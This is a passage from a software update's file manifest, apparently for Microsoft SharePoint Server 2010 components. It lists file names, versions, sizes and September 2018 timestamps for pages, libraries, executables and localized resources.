\nhedit1.apx| edithostdistrule.aspx| | 14,003| 07-Sep-2018| 05:12 \nhelpurl.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| helpurl.xml| | 589| 07-Sep-2018| 04:39 \nhierarchychart.xap| hierarchychart.xap| | 35,423| 11-Sep-2018| 07:24 \nhmng1.apx| managehostdistrules.aspx| | 16,469| 07-Sep-2018| 05:12 \nhold.aspx| hold.aspx| | 5,682| 11-Sep-2018| 03:11 \nholdreport.aspx| holdreport.aspx| | 3,145| 11-Sep-2018| 03:11 \nibmdsmaattributeinclusionlis.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ibmdsmaattributeinclusionlist.xml| | 984| 07-Sep-2018| 04:39 \nibmdsmamandatoryattributelis.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ibmdsmamandatoryattributelist.xml| | 53| 07-Sep-2018| 04:39 \nibmdsmamandatoryobjectclassl.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ibmdsmamandatoryobjectclasslist.xml| | 39| 07-Sep-2018| 04:39 \nibmdsmaobjectclassinclusionl.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ibmdsmaobjectclassinclusionlist.xml| | 331| 07-Sep-2018| 04:39 \nibmdsmapropertypages.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ibmdsmapropertypages.dll| 4.0.2450.49| 92,792| 11-Sep-2018| 06:22 \nibmdsuisettinginit.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ibmdsuisettinginit.xml| | 596| 07-Sep-2018| 04:39 \nifs.xml| ifs.xml| | 69| 07-Sep-2018| 05:39 \nifsadmin.xml| ifsadmin.xml| | 69| 07-Sep-2018| 05:39 \nimpfedl.apx| importfederatedlocation.aspx| | 14,160| 07-Sep-2018| 05:12 \nimporthelperconfig.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| importhelperconfig.xml| | 5,356| 07-Sep-2018| 04:39 \nimportpolicy.aspx| importpolicy.aspx| | 4,110| 11-Sep-2018| 03:11 \nincommon_webpart| incommon.dwp| | 560| 07-Sep-2018| 05:17 \nindicatorwebpart_dwp| indicatorwebpart.dwp| | 1,129| 07-Sep-2018| 05:17 \ninfopcst.asc| infopathpageconvertersettings.ascx| | 2,643| 07-Sep-2018| 12:41 \niniwrkflip.aspx| iniwrkflip.aspx| | 3,032| 11-Sep-2018| 03:11 \ninplcrls.aspx| inplacerecordslistsettings.aspx| | 10,644| 11-Sep-2018| 03:11 \ninplcrst.asx_docrt| inplacerecordssettings.aspx| | 11,898| 11-Sep-2018| 03:11 \ninputcsvfile.apx| inputcsvfile.aspx| | 6,465| 11-Sep-2018| 07:14 \niplanetmapropertypages.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| iplanetmapropertypages.dll| 4.0.2450.49| 125,568| 11-Sep-2018| 06:22 \nipmaattributeinclusionlist.x.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ipmaattributeinclusionlist.xml| | 961| 07-Sep-2018| 04:39 \nipmamandatoryattributelist.x.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ipmamandatoryattributelist.xml| | 53| 07-Sep-2018| 04:39 \nipmamandatoryobjectclasslist.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ipmamandatoryobjectclasslist.xml| | 39| 07-Sep-2018| 04:39 \nipmaobjectclassinclusionlist.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ipmaobjectclassinclusionlist.xml| | 280| 07-Sep-2018| 04:39 \nipuisettinginit.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ipuisettinginit.xml| | 596| 07-Sep-2018| 04:39 \nitemexpiration.aspx| itemexpiration.aspx| | 11,479| 11-Sep-2018| 03:11 \niviewh.aspx| iviewhost.aspx| | 826| 07-Sep-2018| 05:17 \niview_dwp| iviewwebpart.dwp| | 444| 07-Sep-2018| 05:17 \nkeyworddetails1.aspx| keyworddetails.aspx| | 17,103| 07-Sep-2018| 05:12 \nkpiforms.asx| kpilistformtemplates.ascx| | 7,886| 07-Sep-2018| 05:17 \nkpilistwebpart_dwp| kpilistwebpart.dwp| | 1,126| 07-Sep-2018| 05:17 \nkpiview.asx| kpilistviewpage.aspx| | 4,937| 07-Sep-2018| 05:17 \nkword.apx| keyword.aspx| | 11,978| 07-Sep-2018| 05:12 \nlabelimage.aspx| labelimage.aspx| | 375| 11-Sep-2018| 03:11 \nlanguage.asx| languages.aspx| | 3,453| 11-Sep-2018| 03:11 \nlcscntrl.acx| listcontentsourcescontrol.ascx| | 10,770| 07-Sep-2018| 05:12 \nlinkschecker.aspx| linkschecker.aspx| | 5,056| 07-Sep-2018| 05:17 \nlinkscheckerwiz.aspx| linkscheckerwiz.aspx| | 4,400| 07-Sep-2018| 05:17 \nlistenabletargeting.aspx| listenabletargeting.aspx| | 4,171| 07-Sep-2018| 05:17 \nlnksjobset.apx| linkscheckerjobsettings.aspx| | 5,178| 07-Sep-2018| 05:17 \nlnmaattributeinclusionlist.x.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| lnmaattributeinclusionlist.xml| | 1,659| 07-Sep-2018| 04:39 \nlnmamandatoryattributelist.x.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| lnmamandatoryattributelist.xml| | 269| 07-Sep-2018| 04:39 \nlnmamandatoryobjectclasslist.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| lnmamandatoryobjectclasslist.xml| | 65| 07-Sep-2018| 04:39 \nlnmaobjectclassinclusionlist.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| lnmaobjectclassinclusionlist.xml| | 151| 07-Sep-2018| 04:39 \nlnschema.dsml.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| lnschema.dsml| | 26,113| 07-Sep-2018| 04:39 \nlnuisettinginit.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| lnuisettinginit.xml| | 665| 07-Sep-2018| 04:39 \nlocselec.asc| locationselector.ascx| | 3,349| 07-Sep-2018| 12:41 \nlogcss.apx| logcontentsources.aspx| | 14,665| 07-Sep-2018| 05:12 \nlogerr.apx| logerrorhistory.aspx| | 15,700| 07-Sep-2018| 05:12 \nlogging.dll.amd64.e58be079_1383_426a_a42d_a0ada425309f| logging.dll| 4.0.2450.49| 18,528| 11-Sep-2018| 06:22 \nlogging.sln.amd64.e58be079_1383_426a_a42d_a0ada425309f| logging.sln| | 899| 07-Sep-2018| 04:39 \nlogging.vb.amd64.e58be079_1383_426a_a42d_a0ada425309f| logging.vb| | 11,080| 07-Sep-2018| 04:39 \nlogging.vbproj.amd64.e58be079_1383_426a_a42d_a0ada425309f| logging.vbproj| | 3,997| 07-Sep-2018| 04:39 \nlogging.xml.amd64.e58be079_1383_426a_a42d_a0ada425309f| logging.xml| | 448| 07-Sep-2018| 04:39 \nloghst.apx| logcrawlhistory.aspx| | 15,628| 07-Sep-2018| 05:12 \nlogin.xml| login.aspx| | 1,658| 07-Sep-2018| 12:41 \nlogsmry.apx| logsummary.aspx| | 16,828| 07-Sep-2018| 05:12 \nlogvwr.apx| logviewer.aspx| | 25,612| 07-Sep-2018| 05:12 \nlroperationstatus.aspx| lroperationstatus.aspx| | 4,964| 07-Sep-2018| 05:17 \nlroprog.asx| longrunningoperationprogress.aspx| | 5,518| 07-Sep-2018| 12:41 \nlstcat.apx| listcategories.aspx| | 13,565| 07-Sep-2018| 05:12 \nlstcct.apx| listcrawledproperties.aspx| | 14,776| 07-Sep-2018| 05:12 \nlstcs.apx| listcontentsources.aspx| | 9,949| 07-Sep-2018| 05:12 \nlstdspgp.apx| listdisplaygroups.aspx| | 21,655| 07-Sep-2018| 05:12 \nlstkw.apx| listkeywords.aspx| | 6,778| 07-Sep-2018| 05:12 \nlstmnp.apx| listmanagedproperties.aspx| | 14,891| 07-Sep-2018| 05:12 \nlstsnm.apx| listservernamemappings.aspx| | 12,101| 07-Sep-2018| 05:12 \nmaconfig.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| microsoft.directoryservices.metadirectoryservices.config.dll| 4.0.2450.49| 60,104| 11-Sep-2018| 06:22 \nmaconfig.dll_help.xml.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| | | 34,128| 07-Sep-2018| 04:39 \nmaexecution.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| maexecution.dll| 4.0.2450.49| 240,232| 11-Sep-2018| 06:22 \nmaexport.exe.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| maexport.exe| 4.0.2450.49| 23,648| 11-Sep-2018| 06:22 \nmahostm.dll.amd64.7f89bde0_1c6c_49ad_a1d5_ba9bbcc6bbcc| mahostm.dll| 4.0.2450.49| 326,752| 11-Sep-2018| 06:22 \nmahostn.dll.amd64.7f89bde0_1c6c_49ad_a1d5_ba9bbcc6bbcc| mahostn.dll| 4.0.2450.49| 97,376| 11-Sep-2018| 06:22 \nmakecert.exe.62b8ceef_1020_4520_8b7c_a5a4c498eb66| makecert.exe| 6.0.6001.17131 (longhorn_rtm.080108-2300)| 57,856| 07-Sep-2018| 04:39 \nmanagedpropertymanagement1.aspx| managedpropertymanagement.aspx| | 7,206| 07-Sep-2018| 05:12 \nmanagelinks.aspx| managelinks.aspx| | 16,972| 07-Sep-2018| 05:17 \nmanagementpolicyrule.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| managementpolicyrule.moss.sql|managementpolicyrule.sql| | 203,055| 11-Sep-2018| 06:22 \nmanagesocialitems.aspx| managesocialitems.aspx| | 21,281| 07-Sep-2018| 05:17 \nmanagesssvcapplication.aspx| managesssvcapplication.aspx| | 5,221| 07-Sep-2018| 04:31 \nmanagesssvcapplicationcredentials.aspx| managesssvcapplicationcredentials.aspx| | 4,312| 07-Sep-2018| 04:31 \nmanagesubtype.aspx| managesubtypes.aspx| | 4,575| 07-Sep-2018| 05:17 \nmanagetargetappclaims.aspx| managetargetapplicationclaims.aspx| | 4,368| 07-Sep-2018| 04:31 \nmanagetargetappfields.aspx| managetargetapplicationfields.aspx| | 5,102| 07-Sep-2018| 04:31 \nmanagetargetappinstance.aspx| managetargetapplicationinstance.aspx| | 4,536| 07-Sep-2018| 04:31 \nmanagetargetappstate.aspx| managetargetapplicationstateinfo.aspx| | 4,007| 07-Sep-2018| 04:31 \nmanageuserprofileserviceapplication.aspx| manageuserprofileserviceapplication.aspx| | 3,333| 07-Sep-2018| 05:17 \nmanifest.21022.08.vc90_atl_x64.rtm.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.vc90.atl.manifest| | 468| 07-Sep-2018| 04:39 \nmapackager.exe.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mapackager.exe| 4.0.2450.49| 43,624| 11-Sep-2018| 06:22 \nmapropertypages.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| mapropertypages.dll| 4.0.2450.49| 350,832| 11-Sep-2018| 06:22 \nmchrule.apx| matchingrule.aspx| | 18,743| 07-Sep-2018| 05:12 \nmchrule1.apx| matchingrule.aspx| | 24,240| 07-Sep-2018| 05:12 \nmcrcntrl.acx| managecrawlrulescontrol.ascx| | 7,556| 07-Sep-2018| 05:12 \nmcrypt.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mcrypt.dll| 4.0.2450.49| 2,858,592| 11-Sep-2018| 06:22 \nmembership.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| membership.moss.sql|membership.sql| | 181,346| 11-Sep-2018| 06:22 \nmetadatacolsettings.apx| metadatacolsettings.aspx| | 5,365| 11-Sep-2018| 07:14 \nmetadatanavkeyfilters.ascx| metadatanavkeyfilters.ascx| | 4,516| 11-Sep-2018| 03:11 \nmetadatanavtree.ascx| metadatanavtree.ascx| | 2,686| 11-Sep-2018| 03:11 \nmetanavpernode.aspx| metanavpernode.aspx| | 14,134| 11-Sep-2018| 03:11 \nmetanavsettings.aspx| metanavsettings.aspx| | 14,595| 11-Sep-2018| 03:11 \nmetaprxy.apx| managemetadataproxy.aspx| | 5,429| 11-Sep-2018| 07:14 \nmetasvc.apx| managemetadataservice.aspx| | 7,228| 11-Sep-2018| 07:14 \nmgrdsserver.aspx| mgrdsserver.aspx| | 2,181| 07-Sep-2018| 05:17 \nmgrperms.aspx| manageservicepermissions.aspx| | 30,126| 07-Sep-2018| 05:17 \nmgrpolicy.aspx| manageprivacypolicy.aspx| | 16,348| 07-Sep-2018| 05:17 \nmgrproperty.aspx| mgrproperty.aspx| | 2,280| 07-Sep-2018| 05:17 \nmicrosoft.identitymanagement.externalsettingsmanager.dll.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.identitymanagement.externalsettingsmanager.dll| 4.0.2450.49| 31,424| 11-Sep-2018| 06:22 \nmicrosoft.identitymanagement.externalsettingsmanager.dll.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.identitymanagement.externalsettingsmanager.dll| 4.0.2450.49| 31,424| 11-Sep-2018| 06:22 \nmicrosoft.identitymanagement.findprivatekey.exe.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.identitymanagement.findprivatekey.exe| 4.0.2450.49| 16,040| 11-Sep-2018| 06:22 \nmicrosoft.identitymanagement.logging.dll| | 4.0.2450.49| 51,864| 11-Sep-2018| 06:22 \nmicrosoft.identitymanagement.settingscontract.dll.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.identitymanagement.settingscontract.dll| 4.0.0.0| 11,952| 11-Sep-2018| 06:22 \nmicrosoft.identitymanagement.settingscontract.dll.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.identitymanagement.settingscontract.dll| 4.0.0.0| 11,952| 11-Sep-2018| 06:22 \nmicrosoft.identitymanagement.setuputils.dll| microsoft.identitymanagement.setuputils.dll| 4.0.2450.49| 80,544| 11-Sep-2018| 06:22 \nmicrosoft.identitymanagement.setuputils.dll.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.identitymanagement.setuputils.dll| 4.0.2450.49| 80,544| 11-Sep-2018| 06:22 \nmicrosoft.identitymanagement.sqm.dll.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.identitymanagement.sqm.dll| 4.0.2450.49| 39,568| 11-Sep-2018| 06:22 \nmicrosoft.logging.dll.amd64.7f89bde0_1c6c_49ad_a1d5_ba9bbcc6bbcc| microsoft.identitymanagement.logging.dll| 4.0.2450.49| 51,864| 11-Sep-2018| 06:22 \nmicrosoft.metadirectoryservices.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| microsoft.metadirectoryservices.dll|microsoft.metadirectoryservicesex.dll| 4.0.0.0| 60,048| 11-Sep-2018| 06:22 \nmicrosoft.metadirectoryservicesex.dll.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.metadirectoryservicesex.dll| 4.0.0.0| 60,048| 11-Sep-2018| 06:22 \nmicrosoft.office.documentmanagement.dll| microsoft.office.documentmanagement.dll| 14.0.7158.5000| 381,032| 11-Sep-2018| 03:11 \nmicrosoft.office.documentmanagement.dll_isapi| microsoft.office.documentmanagement.dll| 14.0.7158.5000| 381,032| 11-Sep-2018| 03:11 \nmicrosoft.office.documentmanagement.pages.dll| microsoft.office.documentmanagement.pages.dll| 14.0.7005.1000| 125,552| 11-Sep-2018| 03:11 \nmicrosoft.office.policy.dll| microsoft.office.policy.dll| 14.0.7156.5000| 883,376| 11-Sep-2018| 03:11 \nmicrosoft.office.policy.dll_isapi| microsoft.office.policy.dll| 14.0.7156.5000| 883,376| 11-Sep-2018| 03:11 \nmicrosoft.office.policy.pages.dll| microsoft.office.policy.pages.dll| 14.0.7213.5000| 223,752| 11-Sep-2018| 03:11 \nmicrosoft.office.server.chart.dll| microsoft.office.server.chart.dll| 14.0.7005.1000| 608,864| 11-Sep-2018| 05:43 \nmicrosoft.office.server.chart_gac.dll| microsoft.office.server.chart.dll| 14.0.7005.1000| 608,864| 11-Sep-2018| 05:43 \nmicrosoft.office.server.conversions.dll| microsoft.office.server.conversions.dll| 14.0.7113.5001| 35,528| 11-Sep-2018| 03:11 \nmicrosoft.office.server.dll| microsoft.office.server.dll| 14.0.7142.5000| 1,874,600| 11-Sep-2018| 07:14 \nmicrosoft.office.server.dll_isapi| microsoft.office.server.dll| 14.0.7142.5000| 1,874,600| 11-Sep-2018| 07:14 \nmicrosoft.office.server.filtercontrols.dll| microsoft.office.server.filtercontrols.dll| 14.0.7137.5000| 166,600| 11-Sep-2018| 07:14 \nmicrosoft.office.server.native.dll| microsoft.office.server.native.dll| 14.0.7005.1000| 668,256| 11-Sep-2018| 07:14 \nmicrosoft.office.server.openxml.dll| microsoft.office.server.openxml.dll| 14.0.7104.5000| 1,252,032| 11-Sep-2018| 07:14 \nmicrosoft.office.server.userprofiles.dll| microsoft.office.server.userprofiles.dll| 14.0.7159.5000| 2,773,096| 11-Sep-2018| 07:14 \nmicrosoft.office.server.userprofiles.dll_isapi| microsoft.office.server.userprofiles.dll| 14.0.7159.5000| 2,773,096| 11-Sep-2018| 07:14 \nmicrosoft.office.server.userprofiles.managementagent.dll| microsoft.office.server.userprofiles.managementagent.dll| 14.0.7139.5000| 72,416| 11-Sep-2018| 07:14 \nmicrosoft.office.server.userprofiles.synchronization.dll| microsoft.office.server.userprofiles.synchronization.dll| 14.0.7130.5000| 260,832| 11-Sep-2018| 07:14 \nmicrosoft.office.workflowsoap.dll| microsoft.office.workflowsoap.dll| 14.0.7003.1000| 64,152| 11-Sep-2018| 03:11 \nmicrosoft.resman.dll.amd64.7f89bde0_1c6c_49ad_a1d5_ba9bbcc6bbcc| microsoft.resourcemanagement.dll| 4.0.2450.49| 760,456| 11-Sep-2018| 06:22 \nmicrosoft.resman.service.exe.amd64.7f89bde0_1c6c_49ad_a1d5_ba9bbcc6bbcc| microsoft.resourcemanagement.service.exe| 4.0.2450.49| 989,848| 11-Sep-2018| 06:22 \nmicrosoft.resourcemanagement.dll| microsoft.resourcemanagement.dll| 4.0.2450.49| 760,456| 11-Sep-2018| 06:22 \nmicrosoft.resourcemanagement.service.exe| | 4.0.2450.49| 989,848| 11-Sep-2018| 06:22 \nmicrosoft.resourcemanagement.service.exe.config.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.resourcemanagement.service.exe.config| | 3,043| 07-Sep-2018| 04:39 \nmicrosoft.resourcemanagement.service.exe.ilminstall.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.resourcemanagement.service.exe| 4.0.2450.49| 989,848| 11-Sep-2018| 06:22 \nmicrosoft.resourcemanagement.service.exe.mossinstall.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.resourcemanagement.service.exe| 4.0.2450.49| 989,848| 11-Sep-2018| 06:22 \nmicrosoft.resourcemanagement.serviceconfiguration.preparationutility.exe.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.resourcemanagement.serviceconfiguration.preparationutility.exe| 4.0.2450.49| 15,584| 11-Sep-2018| 06:22 \nmicrosoft.resourcemanagement.serviceconfiguration.utility.exe.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.resourcemanagement.serviceconfiguration.utility.exe| 4.0.2450.49| 51,912| 11-Sep-2018| 06:22 \nmicrosoft.sharepoint.publishing.dll_isapi| microsoft.sharepoint.publishing.dll| 14.0.7213.5000| 3,220,616| 11-Sep-2018| 03:06 \nmicrosoft.sharepoint.taxonomy.dll| microsoft.sharepoint.taxonomy.dll| 14.0.7171.5000| 1,064,688| 11-Sep-2018| 07:14 \nmicrosoft.sharepoint.taxonomy.dll_gac| microsoft.sharepoint.taxonomy.dll| 14.0.7171.5000| 1,064,688| 11-Sep-2018| 07:14 \nmicrosoft_office_server_conversions_launcher_exe| microsoft.office.server.conversions.launcher.exe| 14.0.7113.5001| 84,696| 11-Sep-2018| 03:11 \nmicrosoft_office_server_conversions_loadbalancer_exe| microsoft.office.server.conversions.loadbalancer.exe| 14.0.7113.5001| 43,744| 11-Sep-2018| 03:11 \nmiisactivate.exe.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| miisactivate.exe| 4.0.2450.49| 23,656| 11-Sep-2018| 06:22 \nmiisclient.exe.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| miisclient.exe| 4.0.2450.49| 830,056| 11-Sep-2018| 06:22 \nmiisclient.exe.config.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| miisclient.exe.config| | 448| 07-Sep-2018| 04:39 \nmiiserver.exe.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| miiserver.exe| 4.0.2450.49| 2,902,112| 11-Sep-2018| 06:22 \nmiiserver.exe.config.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| miiserver.exe.config| | 2,822| 07-Sep-2018| 04:39 \nmiiskmu.exe.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| miiskmu.exe| 4.0.2450.49| 375,392| 11-Sep-2018| 06:22 \nmiisrcw.dll.62b8ceef_1020_4520_8b7c_a5a4c498eb66| miisrcw.dll| 4.0.2450.49| 39,520| 11-Sep-2018| 06:22 \nmiisrcw.dll.amd64.7f89bde0_1c6c_49ad_a1d5_ba9bbcc6bbcc| miisrcw.dll| 4.0.2450.49| 39,520| 11-Sep-2018| 06:22 \nmiissettingsprovider.dll| | 14.0.7004.1000| 14,416| 11-Sep-2018| 02:53 \nmms.chm.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| mms.chm| | 593,810| 07-Sep-2018| 04:39 \nmmscntrl.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmscntrl.dll| 4.0.2450.49| 300,128| 11-Sep-2018| 06:22 \nmmsevent.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll| 4.0.2450.49| 8,800| 11-Sep-2018| 06:22 \nmmsevent.dll.ar_sa.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 78,912| 11-Sep-2018| 06:22 \nmmsevent.dll.bg_bg.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 94,784| 11-Sep-2018| 06:22 \nmmsevent.dll.ca_es.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 99,904| 11-Sep-2018| 06:22 \nmmsevent.dll.cs_cz.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 86,592| 11-Sep-2018| 06:22 \nmmsevent.dll.da_dk.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 95,808| 11-Sep-2018| 06:22 \nmmsevent.dll.de_de.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 97,856| 11-Sep-2018| 06:22 \nmmsevent.dll.el_gr.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 102,976| 11-Sep-2018| 06:22 \nmmsevent.dll.en_us.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 87,616| 11-Sep-2018| 06:22 \nmmsevent.dll.es_es.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 100,928| 11-Sep-2018| 06:22 \nmmsevent.dll.et_ee.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 79,424| 11-Sep-2018| 06:22 \nmmsevent.dll.fi_fi.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 87,104| 11-Sep-2018| 06:22 \nmmsevent.dll.fr_fr.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 105,536| 11-Sep-2018| 06:22 \nmmsevent.dll.he_il.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 72,768| 11-Sep-2018| 06:22 \nmmsevent.dll.hi_in.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 86,592| 11-Sep-2018| 06:22 \nmmsevent.dll.hr_hr.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 92,736| 11-Sep-2018| 06:22 \nmmsevent.dll.hu_hu.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 97,344| 11-Sep-2018| 06:22 \nmmsevent.dll.it_it.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 96,832| 11-Sep-2018| 06:22 \nmmsevent.dll.ja_jp.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 59,968| 11-Sep-2018| 06:22 \nmmsevent.dll.kk_kz.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 87,104| 11-Sep-2018| 06:22 \nmmsevent.dll.ko_kr.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 53,824| 11-Sep-2018| 06:22 \nmmsevent.dll.lt_lt.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 88,128| 11-Sep-2018| 06:22 \nmmsevent.dll.lv_lv.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 86,096| 11-Sep-2018| 06:22 \nmmsevent.dll.nb_no.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 87,104| 11-Sep-2018| 06:22 \nmmsevent.dll.nl_nl.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 94,784| 11-Sep-2018| 06:22 \nmmsevent.dll.pl_pl.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 100,928| 11-Sep-2018| 06:22 \nmmsevent.dll.pt_br.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 96,832| 11-Sep-2018| 06:22 \nmmsevent.dll.pt_pt.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 96,320| 11-Sep-2018| 06:22 \nmmsevent.dll.ro_ro.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 99,392| 11-Sep-2018| 06:22 \nmmsevent.dll.ru_ru.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 90,176| 11-Sep-2018| 06:22 \nmmsevent.dll.sk_sk.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 88,640| 11-Sep-2018| 06:22 \nmmsevent.dll.sl_si.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 96,320| 11-Sep-2018| 06:22 \nmmsevent.dll.sr_latn_cs.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 91,712| 11-Sep-2018| 06:22 \nmmsevent.dll.sv_se.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 85,568| 11-Sep-2018| 06:22 \nmmsevent.dll.th_th.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 84,544| 11-Sep-2018| 06:22 \nmmsevent.dll.tr_tr.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 88,128| 11-Sep-2018| 06:22 \nmmsevent.dll.uk_ua.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 91,200| 11-Sep-2018| 06:22 \nmmsevent.dll.zh_cn.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 43,584| 11-Sep-2018| 06:22 \nmmsevent.dll.zh_hk.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 46,656| 11-Sep-2018| 06:22 \nmmsevent.dll.zh_tw.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 46,656| 11-Sep-2018| 06:22 \nmmsmaad.dll.amd64.bd43c831_eaf4_4096_bc94_bf6607110b53| mmsmaad.dll| 4.0.2450.49| 583,776| 11-Sep-2018| 06:22 \nmmsmads.dll.amd64.5107b60f_1418_4b38_9a41_4852c2460167| mmsmads.dll| 4.0.2450.49| 523,360| 11-Sep-2018| 06:22 \nmmsmaed.dll.amd64.f9ae12a6_b10b_4e64_9016_cf62e1b0534b| mmsmaed.dll| 4.0.2450.49| 495,712| 11-Sep-2018| 06:22 \nmmsmaext.dll.amd64.70c9c758_1367_4f9c_abd6_65b0137cffcb| mmsmaext.dll| 4.0.2450.49| 473,696| 11-Sep-2018| 06:22 